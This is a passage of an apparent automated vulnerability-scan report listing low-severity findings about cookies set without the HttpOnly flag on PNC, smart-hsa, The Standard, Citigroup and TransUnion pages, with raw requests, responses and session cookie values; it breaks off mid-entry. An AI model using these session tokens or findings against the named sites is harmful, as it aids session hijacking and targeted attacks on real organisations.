Host:   https://www.pnc.com
Path:   /webapp/sec/Forms.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/sec/Forms.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:41 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC9zZWMvRm9ybXMuZG8.
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001S1Sh72Ze-pqHTl-FGyJ5l8c:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=240
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

11.157. https://www.pnc.com/webapp/sec/ProductsAndService.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/sec/ProductsAndService.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/sec/ProductsAndService.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:41 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC9zZWMvUHJvZHVjdHNBbmRTZXJ2aWNlLmRv
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001Fwo1y4EQ_DNlPzYBA3fDCSC:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=240
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

11.158. https://www.pnc.com/webapp/unsec/Blank.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/Blank.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/Blank.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:34 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9CbGFuay5kbw..
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001LOQyaoJEXxHD4aAHzu03qO2:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=35
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

11.159. https://www.pnc.com/webapp/unsec/Gateway.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/Gateway.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/Gateway.do?siteArea=/pnccorp/PNC/Home HTTP/1.1
Host: www.pnc.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:00:35 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9HYXRld2F5LmRv
Surrogate-Control: no-store
Location: https://www.pnc.com/webapp/unsec/Homepage.do?siteArea=/pnccorp/PNC/Home/Personal
Content-Length: 0
Set-Cookie: dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=218
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US


11.160. https://www.pnc.com/webapp/unsec/Homepage.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/Homepage.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/unsec/Homepage.do?siteArea=/pnccorp/PNC/Home/Small+Business HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:33 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Ib21lcGFnZS5kbw..
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=00019a3ZBh0mh-ispl7txSa1-Wc:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Set-Cookie: PNCSessionCookie=/pnccorp/PNC/Home/Small Business; Expires=Thu, 02 Feb 2012 23:45:33 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=228
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 41061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



...[SNIP]...

11.161. https://www.pnc.com/webapp/unsec/Homepage.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/Homepage.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/Homepage.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:33 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Ib21lcGFnZS5kbw..
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001izITxKXJDZCTx_1za1z1i8N:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=37
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

11.162. https://www.pnc.com/webapp/unsec/NCProductsAndService.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/NCProductsAndService.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/NCProductsAndService.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:37 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9OQ1Byb2R1Y3RzQW5kU2VydmljZS5kbw..
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001DxdakGVfzPsG61OoYwy6MqQ:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=297
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

11.163. https://www.pnc.com/webapp/unsec/ProductsAndService.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/ProductsAndService.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/ProductsAndService.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:40 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Qcm9kdWN0c0FuZFNlcnZpY2UuZG8.
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001aNea8mTi43JnvTKJteRIuXq:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=294
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

11.164. https://www.pnc.com/webapp/unsec/Solutions.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/Solutions.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/Solutions.do HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:37 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9Tb2x1dGlvbnMuZG8.
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001ldWPeHvvluWAoHv09MIUxYB:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=300
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 3486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Fatal Error</title>
<meta http-equiv="Con
...[SNIP]...

11.165. https://www.pnc.com/webapp/unsec/depositRates/init.app  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/depositRates/init.app

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/depositRates/init.app HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:41 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9kZXBvc2l0UmF0ZXMvaW5pdC5hcHA.
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001ezUIBevmL8Xq9sXEck-tZO6:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=171
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 40302

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - Interest Rate Center</title>
<meta http-e
...[SNIP]...

11.166. https://www.pnc.com/webapp/unsec/homeEquity/init.app  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.pnc.com
Path:   /webapp/unsec/homeEquity/init.app

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/unsec/homeEquity/init.app HTTP/1.1
Host: www.pnc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_q*epuew-w0-mc*443=ffffffffa9c1271c45525d5f4f58455e445a4a423993; WT_FPC=id=282bf7f27292da7778c1296687699805:lv=1296687699805:ss=1296687699805; PNCSessionCookie=/pnccorp/PNC/Home/Personal; dotdvSession=0001aW4VkcQkR9y4_DaXpbeZTTz:pr-rdc9101516-61027wcm-a/dotdv-ethasp9;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:45:41 GMT
X-HP-CAM-COLOR: V=1;ServerAddr=s946rsl6iu+IpV6oNJLx5Q==;GUID=1|j3jZu7GYX8yqvDh4FQGt9tEmdziTvP87_uyUWYhubxmmEX9A1OQ1yhjc181CfiMT|L3dlYmFwcC91bnNlYy9ob21lRXF1aXR5L2luaXQuYXBw
Surrogate-Control: no-store, content="ESI/1.0+"
Set-Cookie: dotdvSession=0001jrfZahTqT5UlJ4rk1xtE_Dy:pr-rdc9101516-61027wcm-a/dotdv-ethasp9; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=60, max=217
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 39863

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - PNC Home Equity Loan Rates Search</title>
...[SNIP]...

11.167. https://www.retirementgold.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.retirementgold.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.retirementgold.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 156
Content-Type: text/html
Location: https://www.retirementgold.com/fnbo
Set-Cookie: ASPSESSIONIDAAQSTCQQ=GLLJBHGAIDPLDGIHHBMDKOAH; path=/
Date: Wed, 02 Feb 2011 22:20:27 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.retirementgold.com/fnbo">here</a>.</body>

11.168. https://www.smart-hsa.com/pnc/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.smart-hsa.com
Path:   /pnc/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pnc/ HTTP/1.1
Host: www.smart-hsa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: No-Cache
Content-Length: 14470
Content-Type: text/html
Expires: Wed, 02 Feb 2011 22:31:58 GMT
X-Powered-By: ASP.NET
Set-Cookie: SurpasCC=OK; path=/
Set-Cookie: SuRPAS=OK; path=/; secure
Set-Cookie: HSA%5Femployer=; path=/
Set-Cookie: HSA%5FBranch=PN001; path=/
Set-Cookie: HSA%5FClient=PNC; path=/
Set-Cookie: ASPSESSIONIDCAQRACCA=OBAAPFJAMNGHJIIEDCPIAEBF; path=/
Date: Wed, 02 Feb 2011 22:32:58 GMT
Set-Cookie: NSC_q*jgtit-w0-mc*443=ffffffff0965988e45525d5f4f58455e445a4a42378b;path=/;secure;httponly
Set-Cookie: NSC_q*jgtit-w0-htmc*443=ffffffffa9c1665345525d5f4f58455e445a4a420000;path=/;secure;httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

11.169. https://www.smart-hsa.com/pnc/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.smart-hsa.com
Path:   /pnc/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pnc/ HTTP/1.1
Host: www.smart-hsa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: No-Cache
Content-Length: 14470
Content-Type: text/html
Expires: Wed, 02 Feb 2011 22:19:27 GMT
X-Powered-By: ASP.NET
Set-Cookie: SurpasCC=OK; path=/
Set-Cookie: SuRPAS=OK; path=/; secure
Set-Cookie: HSA%5Femployer=; path=/
Set-Cookie: HSA%5FBranch=PN001; path=/
Set-Cookie: HSA%5FClient=PNC; path=/
Set-Cookie: ASPSESSIONIDSCRTBCBA=JONBFMJAMEDBECIICFFLHGBN; path=/
Date: Wed, 02 Feb 2011 22:20:27 GMT
Set-Cookie: NSC_q*jgtit-w0-mc*443=ffffffff09653c8e45525d5f4f58455e445a4a42378b;path=/;secure;httponly
Set-Cookie: NSC_q*jgtit-w0-htmc*443=ffffffffa9c1225345525d5f4f58455e445a4a420000;path=/;secure;httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

11.170. http://www.thestandard.com.hk/news_detail.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.thestandard.com.hk
Path:   /news_detail.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news_detail.asp HTTP/1.1
Host: www.thestandard.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 01:17:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSCSSRSQ=JECBPJKAJCJNPMKCCLGBEBJC; path=/
Cache-control: private


<html>

<HTML>
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e21'</font>
<p>
<font face="Arial" size=2>ODBC driver does no
...[SNIP]...

11.171. http://www.transactionservices.citigroup.com/transactionservices/home/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.transactionservices.citigroup.com
Path:   /transactionservices/home/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /transactionservices/home/ HTTP/1.1
Host: www.transactionservices.citigroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:20:31 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: JSESSIONID=tMY9NJYPQF122mSCD1GNnsZQnSSyyv3QpvnSKh2Ypv5JW6nqjhxH!-455328445; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!-- template version 2.5 -->

<html><!-- InstanceBegin template="/Templates/temp
...[SNIP]...

11.172. http://www.transactionservices.citigroup.com/transactionservices/home/tts/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.transactionservices.citigroup.com
Path:   /transactionservices/home/tts/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /transactionservices/home/tts/ HTTP/1.1
Host: www.transactionservices.citigroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ""
Date: Wed, 02 Feb 2011 22:20:30 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
Set-Cookie: JSESSIONID=0yg9NJYTFn3FQBd5JQK18jnv4gSG01x3vm7SW1QsyXG3TzWNSck0!-455328445; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!-- template version 2.4 -->

<html><!-- InstanceBegin template="/Templates/template01
...[SNIP]...

11.173. http://www.transunion.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.transunion.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.transunion.com
Accept: */*
Accept-Language: en
